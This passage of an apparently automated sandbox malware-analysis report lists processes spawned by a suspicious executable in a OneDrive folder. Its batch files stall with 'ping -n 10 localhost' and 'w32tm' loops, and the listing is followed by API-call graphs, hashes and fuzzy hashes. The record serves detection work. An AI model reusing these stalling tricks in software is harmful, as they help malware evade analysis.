                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x7ff7e17d0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:14:45:59
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0xda0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:14:46:02
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:29
                                                  Start time:14:46:03
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:30
                                                  Start time:14:46:03
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:31
                                                  Start time:14:46:03
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff755dd0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:34
                                                  Start time:14:46:11
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0x8a0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:36
                                                  Start time:14:46:14
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yJr0BespZg.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:37
                                                  Start time:14:46:14
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:38
                                                  Start time:14:46:14
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:39
                                                  Start time:14:46:14
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x7ff7e17d0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:40
                                                  Start time:14:46:23
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0x70000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:42
                                                  Start time:14:46:26
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:43
                                                  Start time:14:46:26
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:44
                                                  Start time:14:46:26
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:45
                                                  Start time:14:46:26
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff755dd0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:46
                                                  Start time:14:46:33
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0x2e0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:48
                                                  Start time:14:46:36
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:49
                                                  Start time:14:46:36
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:50
                                                  Start time:14:46:36
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:51
                                                  Start time:14:46:36
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x7ff7e17d0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:52
                                                  Start time:14:46:46
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0x3d0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:54
                                                  Start time:14:46:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:55
                                                  Start time:14:46:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:56
                                                  Start time:14:46:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:57
                                                  Start time:14:46:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x7ff7e17d0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:58
                                                  Start time:14:46:58
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0xc30000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:2.8%
                                                    Dynamic/Decrypted Code Coverage:80%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:15
                                                    Total number of Limit Nodes:0
                                                    execution_graph 16881 7ffaac7001a9 16882 7ffaac7001b7 CloseHandle 16881->16882 16884 7ffaac700294 16882->16884 16885 7ffaacca2c35 16887 7ffaacca2c4f QueryFullProcessImageNameA 16885->16887 16888 7ffaacca2eda 16887->16888 16877 7ffaac701e35 16878 7ffaac701e4f GetFileAttributesW 16877->16878 16880 7ffaac701f15 16878->16880 16893 7ffaac700040 16894 7ffaac70007b ResumeThread 16893->16894 16896 7ffaac700154 16894->16896 16889 7ffaac6fe84d 16890 7ffaac6fe85b SuspendThread 16889->16890 16892 7ffaac6fe934 16890->16892

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1363044076.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaacca0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID: FullImageNameProcessQuery
                                                    • String ID:
                                                    • API String ID: 3578328331-0
                                                    • Opcode ID: 29fce1e3c3106167b775019adfcbe5934a1708b79b5eb7584458703cdea06ddf
                                                    • Instruction ID: ca60f5a29b49cbfbcd560368092805a9f396a1d9b27ae38bcb75fc2f9b8f6f21
                                                    • Opcode Fuzzy Hash: 29fce1e3c3106167b775019adfcbe5934a1708b79b5eb7584458703cdea06ddf
                                                    • Instruction Fuzzy Hash: A8B13C70918A8D8FEBB8DF18C855BE93BE1FB59301F10812ED84ECB291DB74A545CB81

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1363044076.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaacca0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID: FullImageNameProcessQuery
                                                    • String ID:
                                                    • API String ID: 3578328331-0
                                                    • Opcode ID: b3a0df372fa0d9f730519453bd4c9d88bbb1166c092f40d7144a52f77bd07fbf
                                                    • Instruction ID: 164f49df0a7fa0e20b64807a08a899a8765d34b329b6b15f4035c01fe5817811
                                                    • Opcode Fuzzy Hash: b3a0df372fa0d9f730519453bd4c9d88bbb1166c092f40d7144a52f77bd07fbf
                                                    • Instruction Fuzzy Hash: 98B11B70918A8D8FEBB8DF18C859BE977E1FB59301F10812ED84ECB291DB74A545CB81

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 56 7ffaac700040-7ffaac700079 57 7ffaac70007c-7ffaac700152 ResumeThread 56->57 58 7ffaac70007b 56->58 62 7ffaac700154 57->62 63 7ffaac70015a-7ffaac7001a4 57->63 58->57 62->63
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 66a0596e514ce051891c8697b77a0c14d5fd559b6677e31be61d4e98f5c67788
                                                    • Instruction ID: 257a292a9d8b4608c4ab2c46cc1b16b9734154d18ef3bd8b6183f120a99cff4d
                                                    • Opcode Fuzzy Hash: 66a0596e514ce051891c8697b77a0c14d5fd559b6677e31be61d4e98f5c67788
                                                    • Instruction Fuzzy Hash: 7B517A7090978C8FDB95DBA8D895AE9BFB0EF56310F0481AFD049DB292CA249846CB41

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 66 7ffaac6fe84d-7ffaac6fe859 67 7ffaac6fe864-7ffaac6fe932 SuspendThread 66->67 68 7ffaac6fe85b-7ffaac6fe863 66->68 72 7ffaac6fe934 67->72 73 7ffaac6fe93a-7ffaac6fe984 67->73 68->67 72->73
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0
                                                    • Opcode ID: bb35f19ff75be24411e52b967b614c4f0e3f587e172b5bef43a3d690237a92e3
                                                    • Instruction ID: 41f10c607e6f09ee04a366f5f1e5b6fb83084ff1cf9f86a1aca3cbdbe68b573b
                                                    • Opcode Fuzzy Hash: bb35f19ff75be24411e52b967b614c4f0e3f587e172b5bef43a3d690237a92e3
                                                    • Instruction Fuzzy Hash: 9B414870D0864C8FDB99DFA8D885AEDBBF0FB5A310F10416AD05DE7292DA74A885CB41

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 76 7ffaac701e35-7ffaac701f13 GetFileAttributesW 80 7ffaac701f15 76->80 81 7ffaac701f1b-7ffaac701f59 76->81 80->81
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 6196e5e27fba4a431a7c3e32f321c2dafd3d9dafd15547f1b7bfc484cd5be9d6
                                                    • Instruction ID: 73f29a19669e7f2c8aafa3c51012fac3eacb32fbb4034b151fe5d49128841599
                                                    • Opcode Fuzzy Hash: 6196e5e27fba4a431a7c3e32f321c2dafd3d9dafd15547f1b7bfc484cd5be9d6
                                                    • Instruction Fuzzy Hash: 8B411970E0864C8FDB98DF98D885BEDBBF1FB5A311F10416AD009E7252DA74A845CB41

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 83 7ffaac7001a9-7ffaac7001b5 84 7ffaac7001b7-7ffaac7001bf 83->84 85 7ffaac7001c0-7ffaac700292 CloseHandle 83->85 84->85 89 7ffaac700294 85->89 90 7ffaac70029a-7ffaac7002ee 85->90 89->90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 9af684afcb8249e0a10f6ea91a2beed1b07ad77a5112b146c92ee199406c72f3
                                                    • Instruction ID: e774ebc117d421c8db016cdf6fd42a8cdba9e93e91def69c22c0ed533a7a982d
                                                    • Opcode Fuzzy Hash: 9af684afcb8249e0a10f6ea91a2beed1b07ad77a5112b146c92ee199406c72f3
                                                    • Instruction Fuzzy Hash: D9416C7090864C8FDB99DFA8D888BECBBF0EB5A310F14416AD049E7292DA349885CB41

                                                    • Instruction ID: 2aa1de628928374a4b578ae104eb75f28180c13ec6425b51ac4cd16f89a7a9a7
                                                    • Opcode Fuzzy Hash: 22ad0694187c13114cd25a3b61dcc95cf2a88ea34fd62a840a1a196fe7e998e3
                                                    • Instruction Fuzzy Hash: D011053166864DCFCB48EF28C881AEAB7E0FF59304F0542AAE84DD7251C730E569CB81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 709e8041a73b6a9a6bcbcfcb77f6b181b2811a7d095af668ed1624c8da3b6559
                                                    • Instruction ID: 95d4f00e9fdb634fdcd463ba3753411ab28a5415606fb40f1645ff3e5d2b29cf
                                                    • Opcode Fuzzy Hash: 709e8041a73b6a9a6bcbcfcb77f6b181b2811a7d095af668ed1624c8da3b6559
                                                    • Instruction Fuzzy Hash: AA11C87594E69ECFF7029B68C8151E9BBB4EF93310F0485BAD045DB1E2DE39A508C781
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d2ea1df1432193b36a2be03c53df993327d67ca110971c31aadc17ab06f61f26
                                                    • Instruction ID: 6555ef693022a62851139183297a8f16d8562c8aedbf8afcdd53ffee727870fd
                                                    • Opcode Fuzzy Hash: d2ea1df1432193b36a2be03c53df993327d67ca110971c31aadc17ab06f61f26
                                                    • Instruction Fuzzy Hash: 67F01D7094964E9EEB80EF68D4496EEB7E4FF95315F108476F40CC2190DA35A19487C0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fd8da31ec83bceefc293a0740e8c9c68a611d46c911f29a9aa31e7ba06afda84
                                                    • Instruction ID: 4aadce53db19c3a18492342ea390c999cb47bc0ec6c72a7df5593b0d70294740
                                                    • Opcode Fuzzy Hash: fd8da31ec83bceefc293a0740e8c9c68a611d46c911f29a9aa31e7ba06afda84
                                                    • Instruction Fuzzy Hash: A1F0A97091494D9FDF84EF68D448AAA7BF4FF28301F104565F81DC7264DA30E594CB81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f33310657b05595e2d8133835693a7d5fba7ddf30e4f8654f710b90df2a55494
                                                    • Instruction ID: 36f1e8bfdf78e744e392b698f9eaa052c476975156e76bb99fa038e2a91af190
                                                    • Opcode Fuzzy Hash: f33310657b05595e2d8133835693a7d5fba7ddf30e4f8654f710b90df2a55494
                                                    • Instruction Fuzzy Hash: B5F01C7085594E9FEB80EF68C8496EEBBE4FF58305F408466F81CD3150DA30A6A4CBC0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d47bd54d451aa5c4ffbd446737ba5e1407740217987ede5d92bd13cd15a82e43
                                                    • Instruction ID: fcd498cb985e91988df404740046715b4c041d1cc024b028a2fee8a0c8fef947
                                                    • Opcode Fuzzy Hash: d47bd54d451aa5c4ffbd446737ba5e1407740217987ede5d92bd13cd15a82e43
                                                    • Instruction Fuzzy Hash: 0AF03070D1952FCAFB649B18C8447A976B4FB55304F1084BCD14EA32C0DA385984CF41
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e7c072efc7a6ebf420144e26f7e58e3b666098935ab4f8af04d5bc1ebbcff14c
                                                    • Instruction ID: e00c30cac687be0e16debbdcfc7fd6e5d8a4fdc5825ff90ff0dc564cd2e3c24c
                                                    • Opcode Fuzzy Hash: e7c072efc7a6ebf420144e26f7e58e3b666098935ab4f8af04d5bc1ebbcff14c
                                                    • Instruction Fuzzy Hash: 79F0346090651F8EE7A8DB18C855ABDB7A1EB84240F1081B9D00DA6692DE34AE868F80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a9d92f76bb487c63074e397aa12bbe5f08c65161d12f7db3294501c60ec5e727
                                                    • Instruction ID: fc6473c98af36d999e907daabb16c9c31a82b79240295d6249dac8729db430e8
                                                    • Opcode Fuzzy Hash: a9d92f76bb487c63074e397aa12bbe5f08c65161d12f7db3294501c60ec5e727
                                                    • Instruction Fuzzy Hash: 2AA01220CDA00BC5F220171440083BC14945B02344F00407CA00D14281CD3950480A41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8tyr$N[$N[$N[$gAC$gAC$gAC$rZh$rZh$uUW
                                                    • API String ID: 0-2757119641
                                                    • Opcode ID: f65150b87d66a8951ce24db125ec61f8ab0f50c7ae43a56baa3c5a2e4ae927d9
                                                    • Instruction ID: 5cc54565f6c1bbbf6bc213b1eedaa3b0ebeeee6f02b66e0221af18e405d9b73e
                                                    • Opcode Fuzzy Hash: f65150b87d66a8951ce24db125ec61f8ab0f50c7ae43a56baa3c5a2e4ae927d9
                                                    • Instruction Fuzzy Hash: D843DA709586198FEB94EB28C8A5BEDB7B5FF49300F4045E9D00E972A2DE756E81CF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0_I$0_I$0_I
                                                    • API String ID: 0-3182682118
                                                    • Opcode ID: 531d969b29c6cc3d859a54e030b9bafb8071f907e37fb68e2cbd4a6f91066385
                                                    • Instruction ID: 9716cd1081a5cdf7f7d66ac13e39f95f66e8d949349389264c23f6d6f3e642a0
                                                    • Opcode Fuzzy Hash: 531d969b29c6cc3d859a54e030b9bafb8071f907e37fb68e2cbd4a6f91066385
                                                    • Instruction Fuzzy Hash: 89E1868391FBC2ABFBD282EC08191765EB2BB6355075D80BBD0890B58B9415E91DC3DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
